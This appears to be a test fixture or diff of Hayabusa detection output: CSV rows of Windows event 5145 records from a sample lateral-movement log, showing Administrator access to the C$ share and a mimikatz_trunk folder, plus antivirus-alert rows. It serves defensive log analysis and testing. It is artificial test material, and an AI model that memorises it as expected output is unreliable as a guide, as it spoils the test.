+2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\Sample Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\Sample Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\Sample Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\Sample Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\Sample Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\Sample Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\Sample Media\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\Sample Media | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$ | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
